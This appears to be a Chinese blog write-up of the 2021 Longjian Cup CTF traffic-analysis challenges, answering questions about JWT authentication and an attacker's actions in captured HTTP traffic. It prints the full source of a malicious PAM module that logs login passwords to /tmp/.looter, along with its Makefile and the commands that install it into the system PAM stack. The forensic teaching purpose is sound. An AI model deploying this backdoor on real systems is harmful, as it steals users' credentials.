流量分析——陇剑杯 2021【签到、jwt】

最新推荐文章于 2024-05-27 20:47:37 发布
最新推荐文章于 2024-05-27 20:47:37 发布
阅读量1k 收藏 25
点赞数 23
分类专栏: Misc 文章标签: 网络 网络安全 数据分析 流量分析 日志分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74559567/article/details/136264063
版权

目录

签到

1、攻击者正在进行的可能是什么协议的网络攻击

统计 --> 协议分级

在这里插入图片描述

主要是TCP协议,且应用层协议主要是HTTP

HTTP

jwt

昨天,单位流量系统捕获了黑客攻击流量,请您分析流量后进行回答:

1、该网站使用了______认证方式。

前置知识:

网站使用的认证方式主要有:

  • Session机制
  • JWT
  • OAuth2
  • Cookie
  • HTTP Basic Auth
  • OpenID Connect
  • 双因素认证

记得各种认证方式的主要特征

JWT:头部、载荷和签名三段数据以.分隔,通过base64进行加密

解:

在这里插入图片描述

查看token的信息,明显的jwt认证方式

还可以解码进行验证,直接能识别到用JWT进行解码了~~~

在这里插入图片描述

用base64解头部也一样

在这里插入图片描述

JWT

2、黑客绕过验证使用的jwt中,id和username是

追踪HTTP流

既然问的是id和username,那么就要找whoami这个命令,并且返回200码

在第3个流有所发现

在这里插入图片描述

解码是:

在这里插入图片描述

之后的流中显示的信息是没有成功攻击,继续往下分析

在第10个流时再次发现,往后的流就是在进行攻击

在这里插入图片描述

在这里插入图片描述

把第二段载荷解码即可

对往后的流进行分析

在这里插入图片描述

# eq 11
echo%20MTIz|base64%20-d
# 输出MTIz用base64解码之后的结果
# 返回  123

#eq 12

echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d

输出base64解码后的内容

解码后是一段C代码

在这里插入图片描述

#include <security/pam_appl.h>
#include <security/pam_modules.h>
#include <unistd.h>
size_t write_data(void *buffer, size_t size, size_t nmemb, void *userp)
{
return size * nmemb;
}

void saveMessage(char (*message)[]) {
FILE *fp = NULL;
fp = fopen("/tmp/.looter", "a+");
fputs(*message, fp);
fclose(fp);
}

PAM_EXTERN int pam_sm_setcred( pam_handle_t *pamh, int flags, int argc, const char **argv ) {
return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_acct_mgmt(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}

PAM_EXTERN int pam_sm_authenticate( pam_handle_t *pamh, int flags,int argc, const char **argv ) {
int retval;
const char* username;
const char* password;
char message[1024];
retval = pam_get_user(pamh, &username, "Username: ");
pam_get_item(pamh, PAM_AUTHTOK, (void *) &password);
if (retval != PAM_SUCCESS) {
return retval;
}

snprintf(message,2048,"Username %s\nPassword: %s\n",username,password);
saveMessage(&message);
return PAM_SUCCESS;
}

这段代码是一个PAM模块的示例,用于在Linux系统中进行身份验证,并将用户名和密码保存到文件中。

#eq 13

echo%20I2luY2x1ZGUgPHN0ZGlvLmg%2bCiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPGN1cmwvY3VybC5oPgojaW5jbHVkZSA8c3RyaW5nLmg%2bCiNpbmNsdWRlIDxzZWN1cml0eS9wYW1fYXBwbC5oPgojaW5jbHVkZSA8c2VjdXJpdHkvcGFtX21vZHVsZXMuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgpzaXplX3Qgd3JpdGVfZGF0YSh2b2lkICpidWZmZXIsIHNpemVfdCBzaXplLCBzaXplX3Qgbm1lbWIsIHZvaWQgKnVzZXJwKQp7CnJldHVybiBzaXplICogbm1lbWI7Cn0KCnZvaWQgc2F2ZU1lc3NhZ2UoY2hhciAoKm1lc3NhZ2UpW10pIHsKRklMRSAqZnAgPSBOVUxMOwpmcCA9IGZvcGVuKCIvdG1wLy5sb290ZXIiLCAiYSsiKTsKZnB1dHMoKm1lc3NhZ2UsIGZwKTsKZmNsb3NlKGZwKTsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX3NldGNyZWQoIHBhbV9oYW5kbGVfdCAqcGFtaCwgaW50IGZsYWdzLCBpbnQgYXJnYywgY29uc3QgY2hhciAqKmFyZ3YgKSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2FjY3RfbWdtdChwYW1faGFuZGxlX3QgKnBhbWgsIGludCBmbGFncywgaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2KSB7CnJldHVybiBQQU1fU1VDQ0VTUzsKfQoKUEFNX0VYVEVSTiBpbnQgcGFtX3NtX2F1dGhlbnRpY2F0ZSggcGFtX2hhbmRsZV90ICpwYW1oLCBpbnQgZmxhZ3MsaW50IGFyZ2MsIGNvbnN0IGNoYXIgKiphcmd2ICkgewppbnQgcmV0dmFsOwpjb25zdCBjaGFyKiB1c2VybmFtZTsKY29uc3QgY2hhciogcGFzc3dvcmQ7CmNoYXIgbWVzc2FnZVsxMDI0XTsKcmV0dmFsID0gcGFtX2dldF91c2VyKHBhbWgsICZ1c2VybmFtZSwgIlVzZXJuYW1lOiAiKTsKcGFtX2dldF9pdGVtKHBhbWgsIFBBTV9BVVRIVE9LLCAodm9pZCAqKSAmcGFzc3dvcmQpOwppZiAocmV0dmFsICE9IFBBTV9TVUNDRVNTKSB7CnJldHVybiByZXR2YWw7Cn0KCnNucHJpbnRmKG1lc3NhZ2UsMjA0OCwiVXNlcm5hbWUgJXNcblBhc3N3b3JkOiAlc1xuIix1c2VybmFtZSxwYXNzd29yZCk7CnNhdmVNZXNzYWdlKCZtZXNzYWdlKTsKcmV0dXJuIFBBTV9TVUNDRVNTOwp9|base64%20-d%20>/tmp/1.c

输出的结果定向到/tmp/1.c文件中

#eq 14

ls%20/tmp

查看/tmp文件夹

#eq 15

cat /tmp/1.c

查看1.c的文件内容

#eq 16

echo%20Q0ZMQUdTICs9IC1XZXJyb3IgLVdhbGwKCmxvb3Rlci5zbzogbG9vdGVyLmMKCWdjYyAkKENGTEFHUykgLWZQSUMgLXNoYXJlZCAtWGxpbmtlciAteCAtbyAkQCAkPCAtbGN1cmw=|base64%20-d%20>/tmp/Makefile

在这里插入图片描述

CFLAGS += -Werror -Wall

looter.so: looter.c
	gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl

写入/tmp/Makefile文件中

用于编译一个名为"looter.so"的共享库。其中,CFLAGS变量包含了一些编译选项,如-Werror和-Wall,分别表示将所有警告视为错误和开启所有警告。接下来的规则定义了如何从"looter.c"源文件生成"looter.so"共享库。

#eq 17

ls%20/tmp

查看tmp目录下的文件

#eq 18

cd%20/tmp;make

切换到tmp目录下后执行make命令,进行自动编译

#eq 19

mv%20/tmp/1.c%20/tmp/looter.c

重命名1.clooter.c

#eq 20

cd%20/tmp;make

tmp目录下执行make命令

#eq 21

ls%20/tmp

查看tmp目录下的文件

在这里插入图片描述

多了looter.so文件,进行了编译

#eq 22

cp%20/tmp/looter.so%20/lib/x86_64-linux-gnu/security/

looter.so复制到/lib/x86_64-linux-gnu/security/路径下

#eq 23

ls%20/lib/x86_64-linux-gnu/security/

查看该路径目录文件

#eq 24

echo%20"auth%20optional%20looter.so"

输出字符串auth optional looter.so

#eq 25

echo%20"\nauth%20optional%20looter.so"

输出字符串回车 auth optional looter.so

#eq 26

echo%20"auth%20optional%20looter.so">>/etc/pam.d/common-auth

将这串字符串auth optional looter.so添加到/etc/pam.d/common-auth内容的后面

#eq 27

cat%20/etc/pam.d/common-auth

查看common-auth的文件内容

#eq 28

service%20ssh%20restart

重启ssh服务

#eq 29

whoami

当前用户

#eq 30

ls%20-al%20/tmp

查看详细信息

在这里插入图片描述

#eq 31

cat%20/tmp/.looter

查看.looter文件信息

在这里插入图片描述

10087 admin

3、黑客获取webshell之后,权限是什么

查看whoami返回的值

在这里插入图片描述

root

4、黑客上传的恶意文件文件名是

分析第13流可以知道是1.c

在这里插入图片描述

1.c

5、黑客在服务器上编译的恶意so文件,文件名是什么

分析第16-21流,得知编译后的文件名是looter.so

looter.so

6、黑客在服务器上修改了一个配置文件,文件的绝对路径为

分析第26流,修改的配置文件路径为/etc/pam.d/common-auth

/etc/pam.d/common-auth

Elaine-niu
关注
  • 23
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
陇剑杯学习流量分析
weixin_44687621的博客
09-18 681
JWT 使用wireshark打开附件,追踪HTTP流。 分析这个JWT字段,到jwt.io下面去解出来 追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。 获得命令执行接口后,上传了一个c文件到tmp目录下。 上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。 CFLAGS += -Werror -Wall looter.so: looter.c gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o
陇剑杯jwt.zip 解压密码GAME
09-28
标题 "陇剑杯jwt.zip 解压密码GAME" 暗示了这可能是一个与网络安全竞赛相关的文件包,其中包含了用于解决挑战的资源。"陇剑杯" 是一个以网络安全为主题的比赛,CTF(Capture The Flag)是这类比赛的常见形式,通常...
记一次流量分析实战——2021陇剑杯(webshell)
热门推荐
Battery的博客
08-15 11万+
1.分析数据包hack.pcap,黑客登录系统使用的密码是________。2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。......
流量分析入门
最新发布
2303_81631620的博客
05-27 288
通过捕捉网络中流动的数据包,查看里面的数据和协议,流量分析和各种数据的统计来发现网络运行中的问题,在ctf中一般是一个包含流量数据的 PCAP 文件。
陇剑杯jwt流量分析
m0_57696734的博客
07-17 489
陇剑杯jwt
2021陇剑杯(真流量分析与取证杯)题目复现
Love&Share
09-15 2413
JWT 看session很明显使用了jwt id和username需要去解jwt就可以得到 坑点:不要只看前半部分迷惑流量 没有的到权限所以说这部分流量可以忽略,往后翻 这条流量权限就变成了root,所以这个session才是正确的 解出来id=10087 username=admin 文件就是1.c 编译恶意文件名为looter.so文件,在后边的流量中也是可以看到的 修改的配置文件 SQL注入 附件是access.log日志文件,里边就是sql注入-布尔盲注的数据包 前边的不用看 172.17
电脑常识2021陇剑杯(真流量分析与取证杯)题目复现
11-16 277
电脑常识2021陇剑杯(真流量分析与取证杯)题目复现 根据IAB E“2021年欧洲广告报告”,2021年下半年欧洲数字广告强劲复苏,全年增长6%,达到694亿欧元。刷赞平台的相关资讯可以到我们网站了解一下,从专业角度出发为您解答相关问题,给您优质的服务!教程弟 JWT 看session很明显使用了jwt id和username需要去解jwt就可以得到 坑点:不要只看前半部分迷惑流量 没有的到权限所以说这部分流量可以忽略,往后翻 这条流量权限就变成了root,所以这个session才是
2021陇剑杯部分WP
Y-Y-K的博客
09-15 4898
写在前面的话,结局排名离谱,最后两分钟直接掉了70多名,排出100以外…很久没有打比赛了,但是也没想到国内的CTF环境已经差到这种地步了,另外就是题目都挺好,个别的题目暂时这里不给出解题过程,见谅 签到 操作内容: 看请求包,http请求返回403 Jwt 操作内容: 看cookie,jwt格式 找个在线解jwt的网站,将cookie解码,注意不要解登录失败那个,解登陆成功的 看流量包。alert(“root”) wireshark打开,包序号103 109这两个包,将文件都试下 包序号109,用echo
Spring安全框架——jwt的集成(服务器端)
12-21
在本文中,我们将深入探讨如何将JWT(JSON Web Token)集成到Spring安全框架中,以构建一个基于服务器端的身份验证系统。首先,我们先来看如何建立用户表并进行数据库操作。 1. **创建用户表(users)** - 在...
Android源码——签到系统源码.zip
10-08
这个"Android源码——签到系统源码.zip"文件很可能包含了实现这样一个系统的全部源代码,这为我们提供了深入理解Android应用开发的绝佳机会。下面,我们将详细探讨在Android上开发签到系统可能涉及的关键知识点。 1...
JWT爆破篡改工具-离线
04-03
从爆破到篡改,完美闭环
2021陇剑杯线上赛题.zip
09-28
守护数字安全,构建清朗空间!首届“陇剑杯网络安全大赛,全国首次“以防为主”的网络安全大赛。
jwthelper:JWT令牌生成器
02-24
JWT令牌生成器 生成私钥(jwt.salt)和jwt令牌的助手 该泊坞窗映像有助于快速创建私钥和JWT令牌。 可用版本 您可以通过“ 页面查看所有可从Docker Hub提取的图像。 以“更改类型”字词开头的Docker标记名称(例如...
2021陇剑杯网络安全大赛-日志分析
qq_43264813的博客
09-14 1395
2021陇剑杯网络安全大赛-日志分析 题目描述: 单位某应用程序被攻击,请分析日志,进行作答: 解题思路: 4.1网络存在源码泄漏,源码文件名是_www.zip_。(请提交带有文件后缀的文件名,例如x.txt) 4.2分析攻击流量,黑客往/tmp目录写入一个文件,文件名为_ sess.car_。 4.3分析攻击流量,黑客使用的是_SplFileObject_类读取了秘密文件。 ...
21陇剑杯
m0_52432374的博客
10-17 192
[陇剑杯 2021]jwt
haosha。的博客
01-19 1900
[陇剑杯 2021]jwt 题目做法及思路解析(个人分享)
{NSSCTF} [陇剑杯 2021]签到 详解
lfc18950509270的博客
10-16 599
发现流量包基本都是tcp协议,应用层协议基本是http,就可以判断出是HTTP协议的攻击了。附件下载下来,直接打开流量包。(可以用wireshark)其实没啥好写的,怕小白看不出来,给个提示。选择统计里面的协议分级。
陇剑杯2021(一)
wha1e的博客
06-27 1737
陇剑杯2021(一)
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值